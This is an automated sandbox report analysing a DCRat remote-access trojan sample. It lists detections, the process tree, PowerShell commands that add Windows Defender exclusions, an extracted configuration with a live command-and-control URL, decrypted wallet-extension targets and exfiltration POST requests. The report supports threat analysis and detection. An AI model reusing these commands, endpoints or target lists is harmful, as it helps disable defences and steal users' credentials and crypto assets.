Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
updIMdPUj8.exe

Overview

General Information

Sample name:updIMdPUj8.exe
renamed because original name is a hash value
Original sample name:bc1fb66921db74a0051917b26a4bd316.exe
Analysis ID:1583613
MD5:bc1fb66921db74a0051917b26a4bd316
SHA1:fe3667e5c6a3056dac5bae9f2d718466a0b246bc
SHA256:b87707b4ec5d92bfb2e13e04201fe95df291612511a4023001d0ec7fcbf88cb3
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Drops PE files with benign system names
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • updIMdPUj8.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\updIMdPUj8.exe" MD5: BC1FB66921DB74A0051917B26A4BD316)
    • wscript.exe (PID: 7368 cmdline: "C:\Windows\System32\WScript.exe" "C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c ""C:\BridgeSavesMonitor\PiJ39TM3MwLHVAF8MIz1L5IKE7LQcw3.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • hypersurrogateComponentdhcp.exe (PID: 7600 cmdline: "C:\BridgeSavesMonitor/hypersurrogateComponentdhcp.exe" MD5: 8A121B557A98B065A7CD2EB30882362D)
          • powershell.exe (PID: 7804 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7812 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 7456 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powershell.exe (PID: 7828 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\csrss.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7836 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\ZWgKQlTqcrSB.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7852 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\Accessories\ZWgKQlTqcrSB.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8096 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UV4iXMFwPx.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 5664 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 7000 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • ZWgKQlTqcrSB.exe (PID: 3300 cmdline: "C:\Windows\TAPI\ZWgKQlTqcrSB.exe" MD5: 8A121B557A98B065A7CD2EB30882362D)
  • svchost.exe (PID: 6344 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "true", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
updIMdPUj8.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Recovery\csrss.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              Click to see the 1 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                00000005.00000000.1842993642.0000000000BA2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000018.00000002.2935880086.0000000003199000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: updIMdPUj8.exe PID: 7324JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Click to see the 2 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        5.0.hypersurrogateComponentdhcp.exe.ba0000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Files With System Process Name In Unsuspected Locations
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe, ProcessId: 7600, TargetFilename: C:\Recovery\csrss.exe
                          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\BridgeSavesMonitor/hypersurrogateComponentdhcp.exe", ParentImage: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe, ParentProcessId: 7600, ParentProcessName: hypersurrogateComponentdhcp.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe', ProcessId: 7804, ProcessName: powershell.exe
                          Sigma detected: Powershell Defender Exclusion
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\BridgeSavesMonitor/hypersurrogateComponentdhcp.exe", ParentImage: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe, ParentProcessId: 7600, ParentProcessName: hypersurrogateComponentdhcp.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe', ProcessId: 7804, ProcessName: powershell.exe
                          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\updIMdPUj8.exe", ParentImage: C:\Users\user\Desktop\updIMdPUj8.exe, ParentProcessId: 7324, ParentProcessName: updIMdPUj8.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbe" , ProcessId: 7368, ProcessName: wscript.exe
                          Sigma detected: Non Interactive PowerShell Process Spawned
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\BridgeSavesMonitor/hypersurrogateComponentdhcp.exe", ParentImage: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe, ParentProcessId: 7600, ParentProcessName: hypersurrogateComponentdhcp.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe', ProcessId: 7804, ProcessName: powershell.exe
                          Sigma detected: Windows Processes Suspicious Parent Directory
                          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6344, ProcessName: svchost.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-03T07:58:07.640288+010020481301A Network Trojan was detected192.168.2.44976486.110.194.2880TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: updIMdPUj8.exeAvira: detected
                          Antivirus detection for dropped file
                          Source: C:\Users\user\AppData\Local\Temp\UV4iXMFwPx.batAvira: detection malicious, Label: BAT/Delbat.C
                          Source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                          Source: C:\Recovery\csrss.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\Users\user\Desktop\KCawqqLw.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\Users\user\Desktop\IwSFjKJP.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Found malware configuration
                          Source: 5.0.hypersurrogateComponentdhcp.exe.ba0000.0.unpackMalware Configuration Extractor: DCRat {"C2 url": "http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "true", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                          Multi AV Scanner detection for dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeReversingLabs: Detection: 78%
                          Source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exeReversingLabs: Detection: 78%
                          Source: C:\Program Files\Adobe\ZWgKQlTqcrSB.exeReversingLabs: Detection: 78%
                          Source: C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exeReversingLabs: Detection: 78%
                          Source: C:\Recovery\csrss.exeReversingLabs: Detection: 78%
                          Source: C:\Users\user\Desktop\GQyPcgoW.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\GUTYNdlI.logReversingLabs: Detection: 15%
                          Source: C:\Users\user\Desktop\IECYOtkU.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\KCawqqLw.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\MJbpFLtL.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\NKXFMJFr.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\OxfxrZpJ.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\PybNxWBp.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\QvCVTWQk.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\TkxwTWEx.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\XXPuwSTl.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\XpVNKoNn.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\cXlUovHQ.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\dBJtpdQc.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\eRokfvkG.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\gSeCuhdU.logReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\kJRJIbpu.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\kOfTBNTO.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\kSAcnKQA.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\oROSeukq.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\tahrXlpt.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\xAiiOWpY.logReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\yViIeRfn.logReversingLabs: Detection: 15%
                          Source: C:\Users\user\Desktop\zgCYVAKQ.logReversingLabs: Detection: 50%
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeReversingLabs: Detection: 78%
                          Multi AV Scanner detection for submitted file
                          Source: updIMdPUj8.exeVirustotal: Detection: 58%Perma Link
                          Source: updIMdPUj8.exeReversingLabs: Detection: 68%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\Desktop\EOLhHxkb.logJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\DWtPcxKJ.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\ATGgGOGO.logJoe Sandbox ML: detected
                          Source: C:\Recovery\csrss.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exeJoe Sandbox ML: detected
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\IwSFjKJP.logJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\GUTYNdlI.logJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: updIMdPUj8.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: 00000005.00000000.1842993642.0000000000BA2000.00000002.00000001.01000000.0000000A.sdmpString decryptor: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"Current User","_3":"True"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;example.com;any.domain.net","_1":"mail.google.com;example.com;any.domain.net"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"","_1":"Full path"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"15000000","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
                          Source: 00000005.00000000.1842993642.0000000000BA2000.00000002.00000001.01000000.0000000A.sdmpString decryptor: ["iautCuDPhtVJ2cfkZIsFPp5GJi3lfWEBRXyzdcyyMXeAB5LEz6zm44w3fnjd0btKpU2fopG6U421K4FOWzwjgcHWk4Uz2U7vnUVqDpaJz3R9C4skiVHBpKnMNf5tVQD9","8f8e651a25a945ecc390a45c0da3cfc0265e5ce1aa467481e904db157d1d950e","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJeElpd2lJaXdpWlhsSmQwbHFiMmxsTVU1YVZURlNSbFJWVWxOVFZscEdabE01Vm1NeVZubGplVGhwVEVOSmVFbHFiMmxrU0VveFdsTkpjMGxxU1dsUGFVb3dZMjVXYkVscGQybE5lVWsyU1c1U2VXUlhWV2xNUTBrd1NXcHZhV1JJU2pGYVUwbHpTV3BWYVU5cFNqQmpibFpzU1dsM2FVNXBTVFpKYmxKNVpGZFZhVXhEU1ROSmFtOXBaRWhLTVZwVFNYTkphbWRwVDJsS01HTnVWbXhKYVhkcFQxTkpOa2x1VW5sa1YxVnBURU5KZUUxRFNUWkpibEo1WkZkVmFVeERTWGhOVTBrMlNXNVNlV1JYVldsTVEwbDRUV2xKTmtsdVVubGtWMVZwVEVOSmVFMTVTVFpKYmxKNVpGZFZhVXhEU1hoT1EwazJTVzVTZVdSWFZXbG1VVDA5SWwwPSJd"]
                          Source: 00000005.00000000.1842993642.0000000000BA2000.00000002.00000001.01000000.0000000A.sdmpString decryptor: [["http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/","processorWindowsDatalifepublic"]]
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 24_2_00007FFD9C10367E CryptUnprotectData,24_2_00007FFD9C10367E
                          Source: updIMdPUj8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDirectory created: C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exeJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDirectory created: C:\Program Files\Windows Multimedia Platform\b2c372d662fd88Jump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDirectory created: C:\Program Files\Adobe\ZWgKQlTqcrSB.exeJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDirectory created: C:\Program Files\Adobe\b2c372d662fd88Jump to behavior
                          Source: updIMdPUj8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: updIMdPUj8.exe
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B2A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00B2A69B
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00B3C220
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                          Software Vulnerabilities

                          barindex
                          Suspicious execution chain found
                          Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 4x nop then jmp 00007FFD9B9EDFC6h5_2_00007FFD9B9EDDAD
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 4x nop then jmp 00007FFD9B9FDFC6h24_2_00007FFD9B9FDE01
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 4x nop then jmp 00007FFD9BFCC99Bh24_2_00007FFD9BFCC688
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 4x nop then jmp 00007FFD9C102B29h24_2_00007FFD9C102869
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 4x nop then jmp 00007FFD9C102B29h24_2_00007FFD9C102A38
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 4x nop then jmp 00007FFD9C102B29h24_2_00007FFD9C102A28

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2048130 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) : 192.168.2.4:49764 -> 86.110.194.28:80
                          Uses ping.exe to check the status of other devices and networks
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: Joe Sandbox ViewASN Name: RACKTECHRU RACKTECHRU
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 384Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
